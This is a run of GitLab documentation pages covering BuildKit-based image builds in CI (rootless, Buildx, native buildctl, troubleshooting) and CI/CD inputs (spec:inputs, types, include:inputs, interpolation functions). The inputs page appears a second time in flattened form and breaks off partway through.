    - /kaniko/executor --context $CI_PROJECT_DIR --dockerfile $CI_PROJECT_DIR/Dockerfile --destination $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA
```

After, with BuildKit rootless:

```yaml
build:
  image: moby/buildkit:rootless
  variables:
    BUILDKITD_FLAGS: --oci-worker-no-process-sandbox
  before_script:
    - mkdir -p ~/.docker
    - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json
  script:
    - |
      buildctl-daemonless.sh build \
        --frontend dockerfile.v0 \
        --local context=. \
        --local dockerfile=. \
        --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true
```

## Alternative BuildKit methods

If you don't need rootless builds, BuildKit offers additional methods that require the `docker:dind` service
but provide familiar workflows or advanced features.

### Docker Buildx

Docker Buildx extends Docker build capabilities with BuildKit features while maintaining familiar command syntax.
This method requires the `docker:dind` service.

#### Build basic images

To build Docker images with Buildx, configure your job with the `docker:dind` service and create a `buildx` builder.
For example:

```yaml
variables:
  DOCKER_TLS_CERTDIR: "/certs"

build-image:
  image: docker:latest
  services:
    - docker:dind
  stage: build
  before_script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker buildx create --use --driver docker-container --name builder
    - docker buildx inspect --bootstrap
  script:
    - docker buildx build --tag $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA --push .
  after_script:
    - docker buildx rm builder
```

#### Build multi-platform images

Multi-platform builds create images for different architectures in a single build command.
The resulting manifest supports multiple architectures, and Docker automatically selects
the appropriate image for each deployment target.

To build images for multiple architectures, add the `--platform` flag to specify target architectures.
For example:

```yaml
variables:
  DOCKER_TLS_CERTDIR: "/certs"

build-multiplatform:
  image: docker:latest
  services:
    - docker:dind
  stage: build
  before_script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker buildx create --use --driver docker-container --name multibuilder
    - docker buildx inspect --bootstrap
  script:
    - docker buildx build --platform linux/amd64,linux/arm64 --tag $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA --push .
  after_script:
    - docker buildx rm multibuilder
```

#### Use build caching

Registry-based caching stores build layers in a container registry for reuse across builds.
The `mode=max` option exports all layers to the cache and provides maximum reuse potential for subsequent builds.

To use build caching, add cache options to your build command.
For example:

```yaml
variables:
  DOCKER_TLS_CERTDIR: "/certs"
  CACHE_IMAGE: $CI_REGISTRY_IMAGE:cache

build-with-cache:
  image: docker:latest
  services:
    - docker:dind
  stage: build
  before_script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker buildx create --use --driver docker-container --name cached-builder
    - docker buildx inspect --bootstrap
  script:
    - docker buildx build --cache-from type=registry,ref=$CACHE_IMAGE --cache-to type=registry,ref=$CACHE_IMAGE,mode=max --tag $CI_REGISTRY_IMAGE:$CI_COMMIT_SHA --push .
  after_script:
    - docker buildx rm cached-builder
```

### Native BuildKit

Use native BuildKit `buildctl` commands for more control over the build process.
This method requires the `docker:dind` service.

To use BuildKit directly, configure your job with the BuildKit image and `docker:dind` service.
For example:

```yaml
variables:
  DOCKER_TLS_CERTDIR: "/certs"

build-with-buildkit:
  image: moby/buildkit:latest
  services:
    - docker:dind
  stage: build
  before_script:
    - mkdir -p ~/.docker
    - echo "{\"auths\":{\"$CI_REGISTRY\":{\"username\":\"$CI_REGISTRY_USER\",\"password\":\"$CI_REGISTRY_PASSWORD\"}}}" > ~/.docker/config.json
  script:
    - |
      buildctl build \
        --frontend dockerfile.v0 \
        --local context=. \
        --local dockerfile=. \
        --output type=image,name=$CI_REGISTRY_IMAGE:$CI_COMMIT_SHA,push=true
```

## Troubleshooting

### Build fails with authentication errors

If you encounter registry authentication failures:

- Verify that `CI_REGISTRY_USER` and `CI_REGISTRY_PASSWORD` variables are available.
- Check that you have push permissions to the target registry.
- For external registries, ensure authentication credentials are correctly configured in your project's CI/CD variables.

### Rootless build fails with permission errors

For permission-related issues in rootless mode:

- Ensure `BUILDKITD_FLAGS: --oci-worker-no-process-sandbox` is set.
- Verify that the GitLab Runner has sufficient resources allocated.
- Check that no privileged operations are attempted in your `Dockerfile`.

If you receive `[rootlesskit:child ] error: failed to share mount point: /: permission denied`
on a Kubernetes runner, AppArmor is blocking the mount syscall required for BuildKit.
To resolve this issue, add the following to your runner configuration:

```toml
[runners.kubernetes.pod_annotations]
  "container.apparmor.security.beta.kubernetes.io/build" = "unconfined"
```

### Error: `invalid local: stat path/to/image/Dockerfile: not a directory`

You might get an error that states `invalid local: stat path/to/image/Dockerfile: not a directory`.

This issue occurs when you specify a file path instead of a directory path for the `--local dockerfile=`
parameter. BuildKit expects a directory path that contains a file named `Dockerfile`.

To resolve this issue, use the directory path instead of the full file path.
For example:

- Use: `--local dockerfile=path/to/image`
- Instead of: `--local dockerfile=path/to/image/Dockerfile`

### Multi-platform builds fail

For multi-platform build issues:

- Verify that base images in your `Dockerfile` support the target architectures.
- Check that architecture-specific dependencies are available for all target platforms.
- Consider using conditional statements in your `Dockerfile` for architecture-specific logic.
---
stage: Verify
group: Pipeline Authoring
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: CI/CD input examples
breadcrumbs:
- doc
- ci
- inputs
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

[CI/CD inputs](_index.md) increase the flexibility of your CI/CD configuration.
Use these examples as guidelines for configuring your pipeline to use inputs.

## Include the same file multiple times

You can include the same file multiple times, with different inputs. However, if multiple jobs
with the same name are added to one pipeline, each additional job overwrites the previous job
with the same name. You must ensure the configuration prevents duplicate job names.

For example, including the same configuration multiple times with different inputs:

```yaml
include:
  - local: path/to/my-super-linter.yml
    inputs:
      linter: docs
      lint-path: "doc/"
  - local: path/to/my-super-linter.yml
    inputs:
      linter: yaml
      lint-path: "data/yaml/"
```

The configuration in `path/to/my-super-linter.yml` ensures the job has a unique name
each time it is included:

```yaml
spec:
  inputs:
    linter:
    lint-path:
---

"run-$[[ inputs.linter ]]-lint":
  script: ./lint --$[[ inputs.linter ]] --path=$[[ inputs.lint-path ]]
```

## Reuse configuration in `inputs`

To reuse configuration with `inputs`, you can use [YAML anchors](../yaml/yaml_optimization.md#anchors).

For example, to reuse the same `rules` configuration with multiple components that support
`rules` arrays in the inputs:

```yaml
.my-job-rules: &my-job-rules
  - if: $CI_PIPELINE_SOURCE == "merge_request_event"
  - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH

include:
  - component: $CI_SERVER_FQDN/project/path/component1@main
    inputs:
      job-rules: *my-job-rules
  - component: $CI_SERVER_FQDN/project/path/component2@main
    inputs:
      job-rules: *my-job-rules
```

You cannot use [`!reference` tags](../yaml/yaml_optimization.md#reference-tags) in inputs,
but [issue 424481](https://gitlab.com/gitlab-org/gitlab/-/issues/424481) proposes adding this functionality.

## Use `inputs` with `needs`

You can use array type inputs with [`needs`](../yaml/_index.md#needs) for complex job dependencies.

For example, in a file named `component.yml`:

```yaml
spec:
  inputs:
    first_needs:
      type: array
    second_needs:
      type: array
---

test_job:
  script: echo "this job has needs"
  needs:
    - $[[ inputs.first_needs ]]
    - $[[ inputs.second_needs ]]
```

In this example, the inputs are `first_needs` and `second_needs`, both [array type inputs](_index.md#array-type).

Then, in a `.gitlab-ci.yml` file, you can add this configuration and set the input values:

```yaml
include:
  - local: 'component.yml'
    inputs:
      first_needs:
        - build1
      second_needs:
        - build2
```

When the pipeline starts, the items in the `needs` array for `test_job` get concatenated into:

```yaml
test_job:
  script: echo "this job has needs"
  needs:
    - build1
    - build2
```

### Allow `needs` to be expanded when included

You can have [`needs`](../yaml/_index.md#needs) in an included job, but also add additional jobs
to the `needs` array with `spec:inputs`.

For example:

```yaml
spec:
  inputs:
    test_job_needs:
      type: array
      default: []
---

build-job:
  script:
    - echo "My build job"

test-job:
  script:
    - echo "My test job"
  needs:
    - build-job
    - $[[ inputs.test_job_needs ]]
```

In this example:

- The `test-job` job always needs `build-job`.
- By default the test job doesn't need any other jobs, as the `test_job_needs:` array input
  is empty by default.

To set `test-job` to need another job in your configuration, add it to the `test_job_needs`
input when you include the file. For example:

```yaml
include:
  - component: $CI_SERVER_FQDN/project/path/component@1.0.0
    inputs:
      test_job_needs: [my-other-job]

my-other-job:
  script:
    - echo "I want test-job in the component to need this job too"
```

### Add `needs` to an included job that doesn't have `needs`

You can add [`needs`](../yaml/_index.md#needs) to an included job that does not have `needs`
already defined.

For example, in a CI/CD component's configuration:

```yaml
spec:
  inputs:
    test_job:
      default: test-job
---

build-job:
  script:
    - echo "My build job"

"$[[ inputs.test_job ]]":
  script:
    - echo "My test job"
```

In this example, the `spec:inputs` section allows the job name to be customized.

Then, after you include the component, you can extend the job with the additional `needs` configuration.
For example:

```yaml
include:
  - component: $CI_SERVER_FQDN/project/path/component@1.0.0
    inputs:
      test_job: my-test-job

my-test-job:
  needs: [my-other-job]

my-other-job:
  script:
    - echo "I want my-test-job to need this job"
```

## Use `inputs` with `include` for more dynamic pipelines

You can use `inputs` with `include` to select which additional pipeline configuration files to include.

For example:

```yaml
spec:
  inputs:
    pipeline-type:
      type: string
      default: development
      options: ['development', 'canary', 'production']
      description: "The pipeline type, which determines which set of jobs to include."
---

include:
  - local: .gitlab/ci/$[[ inputs.pipeline-type ]].gitlab-ci.yml
```

In this example, the `.gitlab/ci/development.gitlab-ci.yml` file is included by default.
But if a different `pipeline-type` input option is used, a different configuration file is included.
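When the dynamic configuration above lives in its own file, the consumer selects the pipeline type at `include` time. A minimal sketch of such a consumer, assuming the configuration above is saved as `path/to/dynamic-pipeline.yml` (the file path is illustrative):

```yaml
include:
  - local: path/to/dynamic-pipeline.yml  # hypothetical file holding the spec above
    inputs:
      pipeline-type: canary
```

Because `options` restricts the allowed values, setting `pipeline-type` to anything other than `development`, `canary`, or `production` fails validation when the pipeline is created.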
### Use CI/CD inputs in variable expressions

You can use [CI/CD inputs](_index.md) to customize variable expressions.

For example:

```yaml
example-job:
  script: echo "Testing"
  rules:
    - if: '"$[[ inputs.some_example ]]" == "test-branch"'
```

The expression is evaluated in two steps:

1. Input interpolation: Before the pipeline is created, inputs are replaced with the input value.
   In this example, the `$[[ inputs.some_example ]]` input is replaced with the [set value](_index.md#set-input-values).
   For example, if the value is:
   - `test-branch`, the expression becomes `if: '"test-branch" == "test-branch"'`.
   - `$CI_COMMIT_BRANCH`, the expression becomes `if: '"$CI_COMMIT_BRANCH" == "test-branch"'`.
1. Expression evaluation: After the inputs are interpolated, GitLab attempts to create the pipeline.
   During pipeline creation, the expressions are evaluated to determine which jobs to add to the pipeline.
---
stage: Verify
group: Pipeline Authoring
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: CI/CD inputs
breadcrumbs:
- doc
- ci
- inputs
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/391331) in GitLab 15.11 as a beta feature.
- [Made generally available](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/134062) in GitLab 17.0.

{{< /history >}}

Use CI/CD inputs to increase the flexibility of CI/CD configuration.

Inputs and [CI/CD variables](../variables/_index.md) can be used in similar ways, but have different benefits:

- Inputs provide typed parameters for reusable templates, with built-in validation at pipeline
  creation time. To define specific values when the pipeline runs, use inputs instead of CI/CD variables.
- CI/CD variables offer flexible values that can be defined at multiple levels, but can be modified
  throughout pipeline execution. Use variables for values that need to be accessible in the job's
  runtime environment. You can also use [predefined variables](../variables/predefined_variables.md)
  with `rules` for dynamic pipeline configuration.

## CI/CD inputs and variables comparison

Inputs:

- **Purpose**: Defined in CI/CD configurations (templates, components, or `.gitlab-ci.yml`) and
  assigned values when a pipeline is triggered, allowing consumers to customize reusable CI/CD configurations.
- **Modification**: After they are passed at pipeline initialization, input values are interpolated
  in the CI/CD configuration and remain fixed for the entire pipeline run.
- **Scope**: Available only in the file where they are defined, whether that is the `.gitlab-ci.yml` file
  or a file added with `include`. You can pass them explicitly to other files with `include:inputs`,
  or to a downstream pipeline with `trigger:inputs`.
- **Validation**: Provide robust validation capabilities, including type checking, regex patterns,
  predefined option lists, and helpful descriptions for users.
CI/CD variables:

- **Purpose**: Values that can be set as environment variables during job execution
  and in various parts of the pipeline for passing data between jobs.
- **Modification**: Can be dynamically generated or modified during pipeline execution
  through dotenv artifacts, conditional rules, or directly in job scripts.
- **Scope**: Can be defined globally (affecting all jobs), at the job level (affecting only specific jobs),
  or for the entire project or group through the GitLab UI.
- **Validation**: Simple key-value pairs with minimal built-in validation, though you can add
  some controls through the GitLab UI for project variables.

## Define input parameters with `spec:inputs`

Use `spec:inputs` in the CI/CD configuration [header](../yaml/_index.md#header-keywords) to define
input parameters that can be passed to the configuration file.
Use the `$[[ inputs.input-id ]]` interpolation format outside the header section
to declare where to use the inputs.

For example:

```yaml
spec:
  inputs:
    job-stage:
      default: test
    environment:
      default: production
---

scan-website:
  stage: $[[ inputs.job-stage ]]
  script: ./scan-website $[[ inputs.environment ]]
```

In this example, the inputs are `job-stage` and `environment`.

With `spec:inputs`:

- Inputs are mandatory if `default` is not specified.
- Inputs are evaluated and populated when the configuration is fetched during pipeline creation.
- A string containing an input must be less than 1 MB.
- A string inside an input must be less than 1 KB.
- Inputs can use CI/CD variables, but have the same
  [variable limitations as the `include` keyword](../yaml/includes.md#use-variables-with-include).

Then you set the values for the inputs when you:

- [Trigger a new pipeline](#for-a-pipeline) using this configuration file.
  You should always set default values when using inputs to configure new pipelines
  with any method other than `include`. Otherwise the pipeline could fail to start
  if a new pipeline triggers automatically, including in:
  - Merge request pipelines
  - Branch pipelines
  - Tag pipelines
- [Include the configuration](#for-configuration-added-with-include) in your pipeline.
  Any inputs that are mandatory must be added to the `include:inputs` section,
  and are used every time the configuration is included.

### Input configuration

To configure inputs, use:

- [`spec:inputs:default`](../yaml/_index.md#specinputsdefault) to define default values for inputs
  when not specified. When you specify a default, the inputs are no longer mandatory.
- [`spec:inputs:description`](../yaml/_index.md#specinputsdescription) to give a description to
  a specific input. The description does not affect the input, but can help people
  understand the input details or expected values.
- [`spec:inputs:options`](../yaml/_index.md#specinputsoptions) to specify a list of allowed values
  for an input.
- [`spec:inputs:regex`](../yaml/_index.md#specinputsregex) to specify a regular expression
  that the input must match.
- [`spec:inputs:type`](../yaml/_index.md#specinputstype) to force a specific input type, which
  can be `string` (default when not specified), `array`, `number`, or `boolean`.

You can define multiple inputs per CI/CD configuration file, and each input can have
multiple configuration parameters.
For example, in a file named `scan-website-job.yml`:

```yaml
spec:
  inputs:
    job-prefix:     # Mandatory string input
      description: "Define a prefix for the job name"
    job-stage:      # Optional string input with a default value when not provided
      default: test
    environment:    # Mandatory input that must match one of the options
      options: ['test', 'staging', 'production']
    concurrency:
      type: number  # Optional numeric input with a default value when not provided
      default: 1
    version:        # Mandatory string input that must match the regular expression
      type: string
      regex: ^v\d\.\d+(\.\d+)$
    export_results: # Optional boolean input with a default value when not provided
      type: boolean
      default: true
---

"$[[ inputs.job-prefix ]]-scan-website":
  stage: $[[ inputs.job-stage ]]
  script:
    - echo "scanning website -e $[[ inputs.environment ]] -c $[[ inputs.concurrency ]] -v $[[ inputs.version ]]"
    - if $[[ inputs.export_results ]]; then echo "export results"; fi
```

In this example:

- `job-prefix` is a mandatory string input and must be defined.
- `job-stage` is optional. If not defined, the value is `test`.
- `environment` is a mandatory string input that must match one of the defined options.
- `concurrency` is an optional numeric input. When not specified, it defaults to `1`.
- `version` is a mandatory string input that must match the specified regular expression.
- `export_results` is an optional boolean input. When not specified, it defaults to `true`.

### Input types

You can specify that an input must use a specific type with the optional `spec:inputs:type` keyword.

The input types are:

- [`array`](#array-type)
- `boolean`
- `number`
- `string` (default when not specified)

When an input replaces an entire YAML value in the CI/CD configuration, it is interpolated
into the configuration as its specified type.
For example:

```yaml
spec:
  inputs:
    array_input:
      type: array
    boolean_input:
      type: boolean
    number_input:
      type: number
    string_input:
      type: string
---

test_job:
  allow_failure: $[[ inputs.boolean_input ]]
  needs: $[[ inputs.array_input ]]
  parallel: $[[ inputs.number_input ]]
  script: $[[ inputs.string_input ]]
```

When an input is inserted into a YAML value as part of a larger string, the input
is always interpolated as a string. For example:

```yaml
spec:
  inputs:
    port:
      type: number
---

test_job:
  script: curl "https://gitlab.com:$[[ inputs.port ]]"
```

#### Array type

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/407176) in GitLab 16.11.

{{< /history >}}

The content of the items in an array type can be any valid YAML map, sequence, or scalar.
More complex YAML features like [`!reference`](../yaml/yaml_optimization.md#reference-tags)
cannot be used.

When using the value of an array input in a string (for example
`echo "My rules: $[[ inputs.rules-config ]]"` in your `script:` section), you might see
unexpected results. The array input is converted to its string representation,
which might not match your expectations for complex YAML structures such as maps.

```yaml
spec:
  inputs:
    rules-config:
      type: array
      default:
        - if: $CI_PIPELINE_SOURCE == "merge_request_event"
          when: manual
        - if: $CI_PIPELINE_SOURCE == "schedule"
---

test_job:
  rules: $[[ inputs.rules-config ]]
  script: ls
```

Array inputs must be formatted as JSON, for example `["array-input-1", "array-input-2"]`,
when manually passing inputs for:

- [Manually triggered pipelines](../pipelines/_index.md#run-a-pipeline-manually)
- Git [push options](../../topics/git/commit.md#push-options-for-gitlab-cicd)
- [Pipeline schedules](../pipelines/schedules.md#add-a-pipeline-schedule)

#### Multi-line input string values

Inputs support different value types.
You can pass multi-string values using the following format:

```yaml
spec:
  inputs:
    closed_message:
      description: Message to announce when an issue is closed.
      default: 'Hi {{author}} :wave:,
        Based on the policy for inactive issues, this is now being closed.
        If this issue requires further attention, reopen this issue.'
---
```

## Set input values

### For configuration added with `include`

{{< history >}}

- `include:with` [renamed to `include:inputs`](https://gitlab.com/gitlab-org/gitlab/-/issues/406780) in GitLab 16.0.

{{< /history >}}

Use [`include:inputs`](../yaml/_index.md#includeinputs) to set the values for inputs
when the included configuration is added to the pipeline, including for:

- [CI/CD components](../components/_index.md)
- [Custom CI/CD templates](../examples/_index.md#adding-templates-to-your-gitlab-installation)
- Any other configuration added with `include`

For example, to include and set the input values for `scan-website-job.yml`
from the [input configuration example](#input-configuration):

```yaml
include:
  - local: 'scan-website-job.yml'
    inputs:
      job-prefix: 'some-service-'
      environment: 'staging'
      concurrency: 2
      version: 'v1.3.2'
      export_results: false
```

In this example, the inputs for the included configuration are:

| Input            | Value           | Details |
|------------------|-----------------|---------|
| `job-prefix`     | `some-service-` | Must be explicitly defined. |
| `job-stage`      | `test`          | Not defined in `include:inputs`, so the value comes from `spec:inputs:default` in the included configuration. |
| `environment`    | `staging`       | Must be explicitly defined, and must match one of the values in `spec:inputs:options` in the included configuration. |
| `concurrency`    | `2`             | Must be a numeric value to match the `spec:inputs:type` set to `number` in the included configuration. Overrides the default value. |
| `version`        | `v1.3.2`        | Must be explicitly defined, and must match the regular expression in the `spec:inputs:regex` in the included configuration. |
| `export_results` | `false`         | Must be either `true` or `false` to match the `spec:inputs:type` set to `boolean` in the included configuration. Overrides the default value. |

#### With multiple `include` entries

Inputs must be specified separately for each include entry. For example:

```yaml
include:
  - component: $CI_SERVER_FQDN/the-namespace/the-project/the-component@1.0
    inputs:
      stage: my-stage
  - local: path/to/file.yml
    inputs:
      stage: my-stage
```

### For a pipeline

{{< history >}}

- [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/16321) in GitLab 17.11.

{{< /history >}}

Inputs provide advantages over variables, including type checking, validation, and a clear contract.
Unexpected inputs are rejected.

Inputs for pipelines must be defined in the [`spec:inputs` header](#define-input-parameters-with-specinputs)
of the main `.gitlab-ci.yml` file. You cannot use inputs defined in included files
for pipeline-level configuration.

{{< alert type="note" >}}

In [GitLab 17.7](../../update/deprecations.md#increased-default-security-for-use-of-pipeline-variables)
and later, pipeline inputs are recommended over passing
[pipeline variables](../variables/_index.md#use-pipeline-variables). For enhanced security,
you should [disable pipeline variables](../variables/_index.md#restrict-pipeline-variables)
when using inputs.

{{< /alert >}}

You should always set default values when defining inputs for pipelines.
Otherwise the pipeline could fail to start if a new pipeline triggers automatically.
For example, merge request pipelines can trigger for changes to a merge request's source branch.
You cannot manually set inputs for merge request pipelines, so if any input is missing a default,
the pipeline fails to create. This can also happen for branch pipelines, tag pipelines,
and other automatically triggered pipelines.
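The guidance above can be sketched as a minimal main `.gitlab-ci.yml` with a pipeline-level
input that has a safe default. The `deploy-target` input name, its option values, and the
`./deploy` script are hypothetical:

```yaml
spec:
  inputs:
    deploy-target:
      description: "Environment to deploy to"
      options: ['staging', 'production']
      default: staging  # A default ensures automatically triggered pipelines can still start
---

deploy-job:
  script: ./deploy --target "$[[ inputs.deploy-target ]]"
```

With this configuration, an automatically triggered pipeline (for example a merge request
or branch pipeline) uses `staging`, while a manually triggered pipeline can set the input
to `production` instead.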
You can set input values with:

- [Downstream pipelines](../pipelines/downstream_pipelines.md#pass-inputs-to-a-downstream-pipeline)
- [Manually triggered pipelines](../pipelines/_index.md#run-a-pipeline-manually)
- The [pipeline triggers API](../../api/pipeline_triggers.md#trigger-a-pipeline-with-a-token)
- The [pipelines API](../../api/pipelines.md#create-a-new-pipeline)
- Git [push options](../../topics/git/commit.md#push-options-for-gitlab-cicd)
- [Pipeline schedules](../pipelines/schedules.md#add-a-pipeline-schedule)
- The [`trigger` keyword](../pipelines/downstream_pipelines.md#pass-inputs-to-a-downstream-pipeline)

A pipeline can take up to 20 inputs. Feedback is welcome on
[this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/533802).

You can pass inputs to [downstream pipelines](../pipelines/downstream_pipelines.md),
if the downstream pipeline's configuration file uses
[`spec:inputs`](#define-input-parameters-with-specinputs).
For example, with [`trigger:inputs`](../yaml/_index.md#triggerinputs):

{{< tabs >}}

{{< tab title="Parent-child pipeline" >}}

```yaml
trigger-job:
  trigger:
    strategy: mirror
    include:
      - local: path/to/child-pipeline.yml
        inputs:
          job-name: "defined"
  rules:
    - if: $CI_PIPELINE_SOURCE == 'merge_request_event'
```

{{< /tab >}}

{{< tab title="Multi-project pipeline" >}}

```yaml
trigger-job:
  trigger:
    strategy: mirror
    project: project-group/my-downstream-project
    inputs:
      job-name: "defined"
  rules:
    - if: $CI_PIPELINE_SOURCE == 'merge_request_event'
```

{{< /tab >}}

{{< /tabs >}}

## Specify functions to manipulate input values

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/409462) in GitLab 16.3.

{{< /history >}}

You can specify predefined functions in the interpolation block to manipulate the input value.
The format supported is the following:

```yaml
$[[ inputs.input-id | <function1> | <function2> | ... <functionN> ]]
```

With functions:

- Only [predefined interpolation functions](#predefined-interpolation-functions) are permitted.
- A maximum of 3 functions may be specified in a single interpolation block.
- The functions are executed in the sequence they are specified.

```yaml
spec:
  inputs:
    test:
      default: 'test $MY_VAR'
---

test-job:
  script: echo $[[ inputs.test | expand_vars | truncate(5,8) ]]
```

In this example, assuming the input uses the default value and `$MY_VAR` is an unmasked
project variable with value `my value`:

1. First, the function [`expand_vars`](#expand_vars) expands the value to `test my value`.
1. Then [`truncate`](#truncate) applies to `test my value` with a character offset of `5` and length `8`.
1. The output of `script` would be `echo my value`.

### Predefined interpolation functions

#### `expand_vars`

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/387632) in GitLab 16.5.

{{< /history >}}

Use `expand_vars` to expand [CI/CD variables](../variables/_index.md) in the input value.

Only variables you can [use with the `include` keyword](../yaml/includes.md#use-variables-with-include)
and which are **not** [masked](../variables/_index.md#mask-a-cicd-variable) can be expanded.
[Nested variable expansion](../variables/where_variables_can_be_used.md#nested-variable-expansion)
is not supported.

Example:

```yaml
spec:
  inputs:
    test:
      default: 'test $MY_VAR'
---

test-job:
  script: echo $[[ inputs.test | expand_vars ]]
```

In this example, if `$MY_VAR` is unmasked (exposed in job logs) with a value of `my value`,
then the input would expand to `test my value`.

#### `truncate`

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/409462) in GitLab 16.3.

{{< /history >}}

Use `truncate` to shorten the interpolated value. For example:

- `truncate(<offset>,<length>)`

| Name     | Type    | Description |
| -------- | ------- | ----------- |
| `offset` | Integer | Number of characters to offset by. |
| `length` | Integer | Number of characters to return after the offset. |

Example:

```yaml
$[[ inputs.test | truncate(3,5) ]]
```

Assuming the value of `inputs.test` is `0123456789`, then the output would be `34567`.

## Troubleshooting

### YAML syntax errors when using `inputs`

[CI/CD variable expressions](../jobs/job_rules.md#cicd-variable-expressions) in `rules:if`
expect a comparison of a CI/CD variable with a string, otherwise
[a variety of syntax errors could be returned](../jobs/job_troubleshooting.md#this-gitlab-ci-configuration-is-invalid-for-variable-expressions).

You must ensure that expressions remain properly formatted after input values are inserted
into the configuration, which might require the use of additional quote characters.

For example:

```yaml
spec:
  inputs:
    branch:
      default: $CI_DEFAULT_BRANCH
---

job-name:
  rules:
    - if: $CI_COMMIT_REF_NAME == $[[ inputs.branch ]]
```

In this example:

- Using `include: inputs: branch: $CI_DEFAULT_BRANCH` is valid. The `if:` clause evaluates to
  `if: $CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH`, which is a valid variable expression.
- Using `include: inputs: branch: main` is **invalid**. The `if:` clause evaluates to
  `if: $CI_COMMIT_REF_NAME == main`, which is invalid because `main` is a string but is not quoted.

Alternatively, add quotes to resolve some variable expression issues. For example:

```yaml
spec:
  inputs:
    environment:
      default: "$ENVIRONMENT"
---

$[[ inputs.environment | expand_vars ]] job:
  script: echo
  rules:
    - if: '"$[[ inputs.environment | expand_vars ]]" == "production"'
```

In this example, quoting the input block and also the entire variable expression
ensures valid `if:` syntax after the input is evaluated. The internal and external quotes
in the expression must not be the same character. You can use `"` for the internal quotes
and `'` for the external quotes, or the inverse. On the other hand, the job name does not
require any quoting.
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: CI/CD inputs breadcrumbs: - doc - ci - inputs --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/391331) in GitLab 15.11 as a beta feature. - [Made generally available](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/134062) in GitLab 17.0. {{< /history >}} Use CI/CD inputs to increase the flexibility of CI/CD configuration. Inputs and [CI/CD variables](../variables/_index.md) can be used in similar ways, but have different benefits: - Inputs provide typed parameters for reusable templates with built-in validation at pipeline creation time. To define specific values when the pipeline runs, use inputs instead of CI/CD variables. - CI/CD variables offer flexible values that can be defined at multiple levels, but can be modified throughout pipeline execution. Use variables for values that need to be accessible in the job's runtime environment. You can also use [predefined variables](../variables/predefined_variables.md) with `rules` for dynamic pipeline configuration. ## CI/CD Inputs and variables comparison Inputs: - **Purpose**: Defined in CI configurations (templates, components or `.gitlab-ci.yml`) and assigned values when a pipeline is triggered, allowing consumers to customize reusable CI configurations. - **Modification**: Once passed at pipeline initialization, input values are interpolated in the CI/CD configuration and remain fixed for the entire pipeline run. - **Scope**: Available only in the file they are defined, whether in the `.gitlab-ci.yml` or a file being `include`d. 
You can pass them explicitly to other files - using `include:inputs` - or pipeline using `trigger:inputs`. - **Validation**: Provide robust validation capabilities including type checking, regex patterns, predefined option lists, and helpful descriptions for users. CI/CD Variables: - **Purpose**: Values that can be set as environment variables during job execution and in various parts of the pipeline for passing data between jobs. - **Modification**: Can be dynamically generated or modified during pipeline execution through dotenv artifacts, conditional rules, or directly in job scripts. - **Scope**: Can be defined globally (affecting all jobs), at the job level (affecting only specific jobs), or for the entire project or group through the GitLab UI. - **Validation**: Simple key-value pairs with minimal built-in validation, though you can add some controls through the GitLab UI for project variables. ## Define input parameters with `spec:inputs` Use `spec:inputs` in the CI/CD configuration [header](../yaml/_index.md#header-keywords) to define input parameters that can be passed to the configuration file. Use the `$[[ inputs.input-id ]]` interpolation format outside the header section to declare where to use the inputs. For example: ```yaml spec: inputs: job-stage: default: test environment: default: production --- scan-website: stage: $[[ inputs.job-stage ]] script: ./scan-website $[[ inputs.environment ]] ``` In this example, the inputs are `job-stage` and `environment`. With `spec:inputs`: - Inputs are mandatory if `default` is not specified. - Inputs are evaluated and populated when the configuration is fetched during pipeline creation. - A string containing an input must be less than 1 MB. - A string inside an input must be less than 1 KB. - Inputs can use CI/CD variables, but have the same [variable limitations as the `include` keyword](../yaml/includes.md#use-variables-with-include). 
Then you set the values for the inputs when you: - [Trigger a new pipeline](#for-a-pipeline) using this configuration file. You should always set default values when using inputs to configure new pipelines with any method other than `include`. Otherwise the pipeline could fail to start if a new pipeline triggers automatically, including in: - Merge request pipelines - Branch pipelines - Tag pipelines - [Include the configuration](#for-configuration-added-with-include) in your pipeline. Any inputs that are mandatory must be added to the `include:inputs` section, and are used every time the configuration is included. ### Input configuration To configure inputs, use: - [`spec:inputs:default`](../yaml/_index.md#specinputsdefault) to define default values for inputs when not specified. When you specify a default, the inputs are no longer mandatory. - [`spec:inputs:description`](../yaml/_index.md#specinputsdescription) to give a description to a specific input. The description does not affect the input, but can help people understand the input details or expected values. - [`spec:inputs:options`](../yaml/_index.md#specinputsoptions) to specify a list of allowed values for an input. - 